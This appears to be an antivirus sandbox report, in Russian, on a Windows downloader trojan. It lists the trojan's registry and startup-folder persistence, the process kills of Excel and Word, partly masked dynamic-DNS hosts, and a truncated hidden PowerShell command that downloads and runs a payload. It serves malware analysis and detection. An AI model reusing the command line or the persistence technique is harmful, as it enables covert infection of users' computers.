Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '52UBS6GCDO' = '"%TEMP%\jhonpc.js"'
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\jhonpc.js
Вредоносные функции
Загружает и запускает на исполнение
- http://fo###p.com.br/download/file.php?id### как %temp%\jhon.exe
- http://fo###p.com.br/download/file.php?id### как %temp%\jhonpc.js
Запускает на исполнение
- '<SYSTEM32>\taskkill.exe' /f /im excel.exe
- '<SYSTEM32>\taskkill.exe' /f /im winword.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im excel.exe & taskkill /f /im winword.exe & ping -n 3 localhost & PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFi...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\jhonpc.js
- %TEMP%\jhon.exe
- %TEMP%\rundll.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://fo###p.com.br/download/file.php?id###
Запросы HTTP POST
- http://bo####.duckdns.org:8888/Vre
UDP
- DNS ASK fo###p.com.br
- DNS ASK ru##.ddns.net
- DNS ASK bo####.duckdns.org
- DNS ASK 55####.duckdns.org
Другое
Ищет следующие окна
- ClassName: '' WindowName: ''
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%TEMP%\jhonpc.js"
- '%TEMP%\jhon.exe'
- '%TEMP%\rundll.exe'
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im excel.exe & taskkill /f /im winword.exe & ping -n 3 localhost & PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFi...' (со скрытым окном)
Запускает на исполнение
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '<SYSTEM32>\ping.exe' -n 3 localhost
- '<SYSTEM32>\wscript.exe' "%TEMP%\jhonpc.js"
